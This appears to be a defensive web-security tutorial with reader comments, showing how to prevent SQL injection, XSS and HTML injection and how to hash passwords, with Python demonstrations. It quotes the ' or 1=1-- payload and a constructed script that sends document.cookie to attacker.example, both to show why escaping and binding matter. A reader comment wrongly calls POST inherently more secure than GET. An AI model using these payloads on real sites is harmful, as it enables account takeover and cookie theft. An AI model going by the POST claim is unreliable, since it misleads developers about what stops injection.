
HOW TO PREVENT SQL INJECTION


Securing the Web Server and Site (SQL Injection, JS, XSS, CSS Edition)

Believe it or not, securing a website is harder than defacing it or wrecking its database. Defacements and break-ins that succeed because of a misconfigured system or a webmaster's lack of knowledge are still common.

1. Preventing SQL injection. A classic example of an injection string:

' or 1=1--

The leading quote closes the string literal the application opened, "or 1=1" makes the WHERE clause true for every row, and -- turns the remainder of the statement into a comment.

An attack through this technique is an attack on the database itself. When the application builds its query by concatenating strings, the characters that cause trouble are the single quote ('), the double quote ("), the backslash (\), NUL (\x00), newline (\n), carriage return (\r), Ctrl-Z (\x1a) and the comment sequence --. The first mitigation is to escape every one of these special characters; for PHP/MySQL that means:

mysql_real_escape_string. (Note: the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7.0. Its replacement is mysqli_real_escape_string, or better, prepared statements with bound parameters in mysqli or PDO, which keep the data out of the SQL text altogether and make manual escaping unnecessary.) The second approach is to filter every incoming character and allow only a specific set. Remember that SQL injection does not only arrive through form fields: values in the URL query string are user input too, and the ( ; ) character separates statements, so on a database driver that accepts stacked queries, a second statement appended after ; is executed as well. Treat every query-string value exactly like form input: validate it against an allowlist or bind it as a parameter. An example script that restricts the characters that may be entered:

    ' Allowlist check (VBScript/ASP): accept only ASCII letters; anything else,
    ' including quotes, dashes and semicolons, is rejected. For a real password
    ' field this set is far too narrow (it rejects digits and symbols); the
    ' pattern is what matters, and the query itself should still use bound
    ' parameters.
    Function validatepassword(input)
        Dim good_password_chars, i, c
        good_password_chars = _
            "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        validatepassword = True
        If Len(input) = 0 Then
            validatepassword = False
            Exit Function
        End If
        For i = 1 To Len(input)
            c = Mid(input, i, 1)
            ' InStr returns 0 when c is not in the allowlist (binary compare,
            ' so the check is case-sensitive)
            If InStr(good_password_chars, c) = 0 Then
                validatepassword = False
                Exit Function
            End If
        Next
    End Function
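The following is an added example, not code from the original article: it runs the article's injection string against a login query built by string concatenation (the same defect as interpolating $_POST values into mysql_query()) and against a parameterized query, and it also shows an allowlist for a numeric query-string value such as ?id=123, the case raised in the comments below. Python's sqlite3 stands in for PHP/MySQL; the table, the single user row and the attacker inputs are all constructed for the example.

```python
"""Added example, not code from the original article: SQL injection against
string concatenation versus bound parameters, using Python's sqlite3 in
place of PHP/MySQL. Schema, user row and attacker inputs are constructed."""
import re
import sqlite3
from typing import Optional

# The article's example payload: ' closes the string, "or 1=1" makes the WHERE
# clause always true, -- turns the rest of the statement into a comment.
PAYLOAD = "' or 1=1--"


def make_db() -> sqlite3.Connection:
    """In-memory database with a single constructed account. The password is
    stored in clear only to keep this example about injection; section 5 of
    the article covers hashing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Concatenation: the attacker's quote and comment marker become SQL."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: values travel separately from the statement text, so the
    same payload is compared as a literal username and matches nothing."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def parse_record_id(raw: str) -> Optional[int]:
    """Allowlist for a numeric query-string value such as ?id=123: one to nine
    ASCII digits and nothing else. Returns None for anything that fails."""
    if re.fullmatch(r"[0-9]{1,9}", raw) is None:
        return None
    return int(raw)


def fetch_username(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    """Validate first, then still bind the value; the two layers are independent."""
    record_id = parse_record_id(raw_id)
    if record_id is None:
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?", (record_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concatenated query, payload as username:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("parameterized query, same payload:", login_parameterized(db, PAYLOAD, "wrong"))
    print("?id=1 ->", fetch_username(db, "1"), "| ?id=1 or 1=1 ->", fetch_username(db, "1 or 1=1"))
```

Running the script logs the concatenated query in as "alice" with the payload and a wrong password, while the parameterized query rejects the same input; the allowlisted id lookup returns a row for "1" and None for "1 or 1=1". Validation and binding are independent defences: keep both even when one seems sufficient.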

2. Preventing XSS (Cross-Site Scripting).
Cookie theft is commonly carried out through this technique. Once an XSS flaw exists, an attacker can get a script executed via a form, a guestbook entry or a URL. Although the change only takes effect in the victim's browser, it is another matter entirely when the session cookie is stolen! To prevent XSS, convert < and > into &lt; and &gt; (the HTML entities that display as < and > without being interpreted as tags), encode &, " and ' the same way so that attribute values cannot be broken out of, and filter all user input. Marking the session cookie HttpOnly also keeps it out of reach of injected script.

3. Injection of HTML tags.
This is mostly done through guestbooks: by posting raw markup, someone can change how the page renders to suit themselves. From experience, webmasters used to prevent it by inserting a particular character in front of every < or >. PHP now provides a function for exactly this, so we can simply use it (htmlspecialchars).

Example script:

    // Strip HTML tags (keeping only those listed in $tag, in strip_tags() form
    // such as "<b><i>") unless $preserve is set, then encode the remaining
    // special characters as entities so that nothing left is treated as markup.
    function cleanup($value = "", $preserve = "", $tag = "") {
        if (empty($preserve)) {
            // strip_tags() removes tags; $tag lists the ones allowed to stay
            $value = strip_tags($value, $tag);
        }
        // Encode & < > " and '; name the charset so multibyte input is handled
        $value = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
        return $value;
    }
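The following is an added example, not from the original article, covering sections 2 and 3 together: it compares the article's rule of converting only < and > with the full entity encoding that htmlspecialchars(..., ENT_QUOTES) performs, using Python's standard html module instead of PHP. The guestbook payload, the attribute payload and the comment template are constructed for the example.

```python
"""Added example, not part of the original article: output encoding against
XSS in Python's standard library, contrasting the article's "< and > only"
rule with full entity encoding. All payloads and the template are constructed."""
import html

# A guestbook entry that exfiltrates the cookie if rendered as-is (constructed).
GUESTBOOK_PAYLOAD = '<script>location="http://attacker.example/?c="+document.cookie</script>'
# A value aimed at an attribute context: no angle brackets at all (constructed).
ATTRIBUTE_PAYLOAD = 'x" onfocus="alert(document.cookie)" autofocus="'


def escape_angle_brackets_only(s: str) -> str:
    """The article's rule taken literally: only < and > become entities."""
    return s.replace("<", "&lt;").replace(">", "&gt;")


def escape_for_html(s: str) -> str:
    """What htmlspecialchars() with ENT_QUOTES does: & < > " and ' all become
    entities, so the result is safe as element text and inside quoted
    attribute values."""
    return html.escape(s, quote=True)


def render_comment(author: str, body: str) -> str:
    """One guestbook entry: author lands in an attribute, body in element text.
    Both go through the same encoder."""
    return ('<div class="comment" data-author="%s">%s</div>'
            % (escape_for_html(author), escape_for_html(body)))


def breaks_out_of_attribute(encoded: str) -> bool:
    """True if a raw double quote survived encoding, i.e. the value could
    terminate the attribute it is placed in and start a new one."""
    return '"' in encoded


if __name__ == "__main__":
    print("angle brackets only, attribute payload:",
          escape_angle_brackets_only(ATTRIBUTE_PAYLOAD))
    print("full encoding, attribute payload:", escape_for_html(ATTRIBUTE_PAYLOAD))
    print(render_comment(ATTRIBUTE_PAYLOAD, GUESTBOOK_PAYLOAD))
```

Encoding only < and > neutralises the script tag in the body but leaves the attribute payload intact, because it contains no angle brackets: the raw double quote closes data-author and the rest becomes an onfocus handler. Full entity encoding handles both contexts; JavaScript, CSS and URL contexts need their own encoders and are out of scope here.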

4. Limit the use of JavaScript, and never rely on it for anything on which the survival of your site depends: it runs on the client, where the user (or attacker) controls it and can disable or modify it, and heavy scripts also slow the page down. Do validation and access control in server-side code such as PHP or ASP; client-side checks are a convenience only.

5. Database files should be stored in a private directory, never in a public, web-accessible directory where others could download them; most web hosts already provide a dedicated directory for this. The database must be protected with a password, and the connection should be encrypted with SSL/TLS. Sensitive data should not be stored directly: passwords should be stored as a salted, deliberately slow password hash (bcrypt, PBKDF2 or Argon2) rather than a plain MD5. (Note: SHA-256 and SHA-512 belong to the SHA-2 family and are not modifications of MD5; like MD5 they are fast general-purpose hashes, so they need a salt and a work factor before they are suitable for passwords.) Other secrets that must be recoverable should be encrypted at the application level, for example in PHP, rather than stored in clear.
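The following is an added example, not from the original article: the unsalted MD5 the article mentions next to a salted, iterated PBKDF2-HMAC-SHA256 hash from Python's hashlib, with a constant-time comparison on verification. The two sample passwords are constructed; the iteration count follows the OWASP Password Storage Cheat Sheet's figure for PBKDF2-HMAC-SHA256.

```python
"""Added example, not part of the original article: storing passwords as a
salted, slow hash instead of a bare MD5. Sample passwords are constructed."""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000  # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256


def md5_unsalted(password: str) -> str:
    """What 'store the md5' means in practice: identical passwords give identical
    digests, so one cracked row or a precomputed table breaks them all."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Returns 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'. A fresh
    16-byte random salt per user unless one is supplied (for tests)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare_digest avoids
    leaking where the first mismatching byte is. Malformed records never verify."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        rounds = int(iterations)
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256" or rounds < 1:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Two users who chose the same password (constructed).
    print("md5, user A:", md5_unsalted("correct horse"))
    print("md5, user B:", md5_unsalted("correct horse"))
    a, b = hash_password("correct horse"), hash_password("correct horse")
    print("pbkdf2, user A:", a)
    print("pbkdf2, user B:", b)
    print("verify A:", verify_password("correct horse", a), "| wrong:", verify_password("Correct horse", a))
```

Two users with the same password get the same MD5 but different PBKDF2 records, because the salt is random; the record carries its own salt and iteration count, so the work factor can be raised later and old records still verify. Argon2id or bcrypt are preferable when a library is available; PBKDF2 is shown because it needs nothing beyond the standard library.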

6. Choose your web host carefully; we have learned this the hard way. However well the site is built, even if the password is checked twice and encrypted any number of times, once the server itself is compromised there is nothing we can do.

Source:
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA
http://mr-amateur.co.cc

Category: TIPS-TRIK
  1. budi
    January 14, 2011 at 1:00 pm

    How do you filter the 'id' input in a URL that uses a query string, e.g. detil.php?id=123? What kind of filter is needed?

  2. ario pamungkas bayu aji
    November 3, 2011 at 1:14 am

    How do you prevent SQL injection when using ASP?

  3. January 7, 2012 at 11:16 am

    @budi, it is better to use the POST method for data input, so it is more secure.

    @ario, which component do you use to access the database? If you use ADO, use the SQLParameter object for CRUD, and don't forget that the textbox length should not be larger than the field length in the database table.

  11. dang_6477
    February 13, 2014 at 4:27 am

    Great article; problems like these are exactly what give web admins and their programmers headaches.
